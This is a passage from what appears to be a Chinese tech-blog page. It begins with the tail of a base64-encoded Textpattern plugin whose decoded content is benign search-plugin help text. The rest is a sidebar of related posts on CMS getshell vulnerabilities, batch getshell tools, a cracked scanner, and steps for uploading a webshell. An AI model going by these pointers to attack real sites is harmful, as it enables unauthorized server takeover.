vZGU+P3E9cmVkK2JsdWU8L2NvZGU+IGFuZCBvdXRwdXQgKHdpdGggdGhlIGRlZmF1bHQgc2VhcmNoKSBhbGwgdGhlIGFydGljbGVzIGNvbnRhaW5pbmcgYm90aCAicmVkIiBhbmQgImJsdWUiLiBUaGlzIGFsbG93cyB0byB1c2UgPGNvZGU+Jmx0O3R4cDpldGNfc2VhcmNoX3Jlc3VsdHMgLyZndDs8L2NvZGU+IGFzIDxjb2RlPiZsdDt0eHA6YXJ0aWNsZV9jdXN0b20gLyZndDs8L2NvZGU+IHdpdGggdmVyeSBjdXN0b21pemFibGUgPGNvZGU+d2hlcmU8L2NvZGU+IGF0dHJpYnV0ZS48L3A+Cgo8aDM+VGhlIDxjb2RlPmV0Y19zZWFyY2hfcmVzdWx0X2V4Y2VycHQ8L2NvZGU+IHRhZzwvaDM+Cgo8cD5Zb3UgY2FuIGFsc28gcmVwbGFjZSA8Y29kZT4mbHQ7dHhwOnNlYXJjaF9yZXN1bHRfZXhjZXJwdCAvJmd0OzwvY29kZT4gd2l0aCA8Y29kZT4mbHQ7dHhwOmV0Y19zZWFyY2hfcmVzdWx0X2V4Y2VycHQgLyZndDs8L2NvZGU+IHdoZXJlIGFwcHJvcHJpYXRlLiBJdCBhY2NlcHRzIHNvbWUgYWRkaXRpb25hbCBhdHRyaWJ1dGVzOjwvcD4KPHVsPgo8bGk+PGNvZGU+dHlwZT0iYXJ0aWNsZSI8L2NvZGU+OzwvbGk+CjxsaT48Y29kZT5maWVsZD0iYm9keSI8L2NvZGU+OzwvbGk+CjxsaT48Y29kZT5zaXplPSI1MCI8L2NvZGU+OiB0aGUgbWF4aW11bSBudW1iZXIgb2Ygc3Vycm91bmRpbmcgY2hhcmFjdGVyczs8L2xpPgo8bGk+PGNvZGU+c2hvd2Fsd2F5cz0iMCI8L2NvZGU+OiBzaG93IGFuIGV4Y2VycHQgZXZlbiBpZiB0aGVyZSBpcyBubyBtYXRjaC48L2xpPgo8L3VsPgoKCjxoMz5UaGUgPGNvZGU+ZXRjX3NlYXJjaF9yZXN1bHRfY291bnQ8L2NvZGU+IHRhZzwvaDM+CjxwPkFjY2VwdHMgb25seSA8Y29kZT50ZXh0PC9jb2RlPiBhdHRyaWJ1dGUuIFRoZSB0b2tlbnMgPGNvZGU+e2Zyb219LCB7dG99LCB7dG90YWx9LCB7cGFnZX0sIHtwYWdlc308L2NvZGU+IHRoZXJlaW4gd2lsbCBiZSByZXBsYWNlZCBieSBjb3JyZXNwb25kaW5nIHZhbHVlcywgdG8gZGlzcGxheSBhIHN0cmluZyBsaWtlIDxjb2RlPlJlc3VsdHMgNiB0byAxMCBvZiAyNzwvY29kZT4uPC9wPgoKCTxoMz48c3BhbiBjbGFzcz0iY2FwcyI+Q1NTPC9zcGFuPlN0eWxpbmc8L2gzPgoKCTxwPlRoZSBsaXZlIHNlYXJjaCBjb25zaXN0cyBvZiBhIGZvcm0gd2l0aCB0aGUgPGNvZGU+aWQ8L2NvZGU+IGF0dHJpYnV0ZSB2YWx1ZSBzZXQgYnkgdGhlICYjODIyMDtodG1sX2lkJiM4MjIxOyBwYXJhbWV0ZXIuIFRoaXMgZm9ybSBjb250YWlucyB0d28gem9uZXMuIFlvdSBjYW4gc3R5bGUgYW55IGVsZW1lbnQgYnkgcmVmZXJlbmNpbmcgdGhlIGlkIGF0dHJpYnV0ZSBvZiB0aGUgZm9ybSBhbmQgdGhlIDxzcGFuIGNsYXNzPSJjYXBzIj5DU1M8L3NwYW4+IGNsYXNzIG9mIHRoZSBlbGVtZW50IChvciBpdHMgdGFnKSBpbiB5b3VyIDxzcGFuIGNsYXNzPSJjYXBzIj5DU1M8L3NwYW4+LjwvcD4KCgk8aDQ+VGhlIHNlYXJjaCB6b25lPC9oND4KCgk8cD5UaGUgZmlyc3Qgem9uZSBpcyBhIGJsb2NrIHdpdGggdGhlIGFwcGxpZWQgY2xhc3MgJiM4MjIwO2xzX3NlYXJjaCYjODIyMTsgd2hpY2ggY29udGFpbnM6IHRoZSBvcHRpb25hbCBsYWJlbCAoZm9sbG93ZWQgYnkgYSBsaW5lIGJyZWFrIGlmIGRlZmluZWQpIGFuZCB0aGUgdGV4dCBpbnB1dCBib3guIFRoZSB0YWcgb2YgdGhpcyBibG9jayBpcyBkZWZpbmVkIGJ5IHRoZSAmIzgyMjA7d3JhcHRhZyYjODIyMTsgcGFyYW1ldGVyIChkZWZhdWx0IGlzIDxjb2RlPmRpdjwvY29kZT4pLjwvcD4KCgk8cD5UaGUgZGVmYXVsdCBzZWFyY2ggYm94IGlzIGFuIGlucHV0IHRhZy4gSWYgeW91IHdhbnQsIHlvdSBjYW4gc3R5bGUgaXQgdXNpbmcgYSA8c3BhbiBjbGFzcz0iY2FwcyI+Q1NTPC9zcGFuPiBydWxlIGxpa2UgdGhpcyBvbmU6PC9wPgoKPHByZT48Y29kZT4jbGl2ZV9zZWFyY2ggaW5wdXQgewogICAgZm9udC1zaXplOiAxMHB4OwogICAgY29sb3I6ICMwMDA7Cn0KPC9jb2RlPjwvcHJlPgoKCTxoND5UaGUgcmVzdWx0cyB6b25lPC9oND4KCgk8cD5UaGUgcmVzdWx0cyB6b25lIGlzIGEgPGNvZGU+ZGl2PC9jb2RlPiBibG9jayB3aXRoIHRoZSBjbGFzcyAmIzgyMjA7bHNfc2VhcmNoJiM4MjIxOywgY29udGFpbmluZyB0aGUgcmVzdWx0cyBsaXN0LiBZb3UgY2FuIGNob29zZSB0byBwb3NpdGlvbiB0aGlzIGJsb2NrIGFic29sdXRlbHksIG9yIGV2ZW4gcmVwbGFjZSBpdCB3aXRoIGFueSBibG9jaywgc2V0dGluZyA8Y29kZT50YXJnZXQ8L2NvZGU+IGF0dHJpYnV0ZS48L3A+CgoJPHA+SWYgeW91IGFyZSBub3QgaGFwcHkgd2l0aCB0aGUgZGVmYXVsdCBhbmltYXRpb24sIHVuYmluZCA8Y29kZT51cGRhdGUuaHRtbF9pZDwvY29kZT4gZXZlbnQgb2YgdGhlIDxjb2RlPnRhcmdldDwvY29kZT4gYW5kIHJlcGxhY2UgdGhlbSB3aXRoIHlvdXIgb3duIGpRdWVyeSBhbmltYXRpb25zLiBZb3UgY2FuIGFsc28gc2V0IDxjb2RlPnN0YXJ0PC9jb2RlPiBhbmQgPGNvZGU+c3RvcDwvY29kZT4gZXZlbnRzLCBmaXJlZCBhdCB0aGUgYmVnaW5uaW5nIGFuZCB0aGUgZW5kIG9mIGxpdmUgQUpBWCByZXF1ZXN0cy48L3A+CgoJPHA+VGhlIGNvbnRlbnQgb2YgdGhlIHJlc3VsdHMgYmxvY2sgd2lsbCBiZSBlaXRoZXI6PC9wPgoKCTxvbD4KCQk8bGk+PGVtPkF0IGxlYXN0IG9uZSByZXN1bHQgaXMgZm91bmQ6PC9lbT4gQSBsaXN0IHdpdGggd3JhcCBhbmQgYnJlYWsgdGFncyBhY2NvcmRpbmcgdG8geW91ciAmIzgyMjA7d3JhcHRhZyYjODIyMTsgYW5kICYjODIyMDticmVhayYjODIyMTsgcGFyYW1ldGVycyAoc2VlIGFib3ZlKS48L2xpPgoJCTxsaT48ZW0+Tm8gcmVzdWx0cyBmb3VuZDo8L2VtPiBUaGUgbG9jYWxpemVkICYjODIyMDtub19zZWFyY2hfbWF0Y2hlcyYjODIyMTsgbWVzc2FnZS48L2xpPgoJPC9vbD4iO3M6MzoibWQ1IjtzOjMyOiI3ZTI5NDA5MjFjZmY2ZTQ5YjdhMGZjODRkM2NhNTVjYSI7fQ==
云雕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TextpatternCMS一个灵活优雅易于使用的内容管理系统
08-08
Textpattern CMS一个灵活,优雅,易于使用的内容管理系统。 Textpattern是免费的和开源的。
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
TextpatternCMS后台未过滤直接上传php导致getshell
云雕的博客
06-18 500
该漏洞CNVD-ID: CNVD-2019-12539 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53 产品官网:https://textpattern.com/ github: https://github.com/textpattern/textpat...
推荐一款优雅的PHP CMSTextpattern
最新发布
gitblog_00022的博客
05-09 337
推荐一款优雅的PHP CMSTextpattern 项目地址:https://gitcode.com/textpattern/textpattern 如果你正在寻找一个灵活、高效且易于使用的开源内容管理系统,那么Textpattern值得你的关注。这款由PHP编写的CMS以其简洁的设计和强大的功能赢得了开发者和网站管理员的赞誉。 项目介绍 Textpattern是一款免费且开源的软件,提供了一种...
[代码审计]Textpattern4.8.4任意文件上传漏洞
Y4tacker的博客
04-25 667
在网上看到的公开不久,自己无聊随意进行分析一下啦 利用点在后台上传插件的地方 从这里跟踪发现其调用了plugin_upload函数 照顾小白加一点批注吧 function plugin_upload() { $plugin = array(); if ($_FILES["theplugin"]["name"]) { //获取上传表单 $filename = $_FILES["theplugin"]["name"]; $source = $_FIL
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
2019-新闻原getshell.rar
09-26
综上所述,这个“2019-新闻原getshell.rar”压缩包包含了一个专门针对新闻源网站的getshell工具,该工具可能是用于检测和利用Web服务器漏洞的软件,尤其是那些可能导致webshell被上传的漏洞。对于网站管理员而言,...
dz 所有版本后台GET SHELL1
08-08
论坛在不同版本中存在后台GET SHELL漏洞,这些漏洞主要通过插件管理和语言包功能进行利用。攻击者可以通过构造特定的数据包,绕过安全防护,获取Webshell,从而远程控制论坛系统。为了防止此类攻击,管理员应及...
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
小型博客平台Textpattern.zip
07-17
Textpattern 比任何一个博客软件都要简单,甚至连 WYSIWYG 编辑器都没有,而是使用 Textile 置标语言来排版。 Textpattern 与 ExpressionEngine 非常相似,除了 ExpressionEngine 提供的一些即装即用的功能(阅读更多有关两者的区别)。而 Textpattern 更加成熟、稳定,由于需要学会使用 Textile 语言,所以不太适合新手。如果要使用 WYSIWYG 编辑器的话,需要另外安装插件。 虽然 Textpattern 的用户不如 Wordpress 那么多,但都是非常忠实的用户,开发出了丰富的主题和扩展。 喜欢简洁,而且不介意学习 Textile 的话,Textpattern 对于进阶 blogger 是个很好的选择。 标签:Textpattern
textpattern-4.2.0.zip 不错的BLOG
11-04
如果说Wordpress是社会化软件的产物,那么Textpattern无疑就是个性化软件的代表作。直到自己后来开始自己写blog软件,才发现将这些复杂的功能隐藏在看似简单的表面底下是需要多么精巧地构思。 今天在Hello Wiki里看到了一则国人的(本来就是chinese...)文章,是关于Textpattern的。这篇文章的作者阐述了他使用Textpattern的理由,以及对Textpattern现状的解释。看完以后我得出一个结论,这的确是一款有着自己文化的软件。文中也提到了国内的一款非常优秀的blog软件--Sablog,这款软件的确是我见到的blog中速度最快的了。 所以,大概所有的Textpattern用户都在内心形成了这种默契,他们细心地默默地打理着这款软件,同又低调地处理着外界的评论,这真是他们的一片天地!
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
finecms aip.php漏洞,FineCMS最新版5.0.8两处getshell(附python批量poc脚本)
weixin_36474966的博客
03-11 673
0x01 前言就要被**,美其名曰:比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火,找到六处漏洞,先放两处容易被发现的getshell和对应的两个python脚本0x02 getshell第一处getshell:在C:phpStudyWWWfinecmsdayruicontrollersApi.php中的data2函数,大约在第115行,有问题的代码大约在1...
铭飞CMS存在文件上传---getshell
qq_50854662的博客
03-28 337
铭飞CMS存在文件上传---getshell
textpattern 在 nginx 上的 rewrite 规则
weixin_33873846的博客
07-31 75
Clean URLs for Textpattern with Nginx 最近又开始折腾 textpattern  ,由于我的 web 环境是基于 nginx ,在网上搜索了下 textpattern 在 nginx 上的 rewrite 规则,找到一个最完美的, 适用 textpattern 的各种链接形式 Reference Address: http://moti...
getshell总结(国内常见cms拿webshell
weixin_45509216的博客
05-01 1270
文档:getshell总结.note 链接:http://note.youdao.com/noteshare?id=b58d8f4a93c3e5cb0f40ffa5243c11e6&sub=A2B0957B245545E085B2D45616CE3E78
BlueCMS_v1.6漏洞挖掘——GetShell
渗透测试
09-15 1646
BlueCMS_v1.6漏洞挖掘——GetShell 渗透思路: 1. 进入网站 2. 扫描后台 3. 百度blueCMS相关漏洞(最好是后台) 4. 进入后台 5. 查看是否有上传文件入口 6. 上传一句话木马(如果有类型防护,可以转图片木马) 7. 查看是否有文件包含漏洞 8. 修改指定文件,把木马写进去 9. 菜刀getshell 视频链接 BlueCMSv1.6漏洞GetShell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值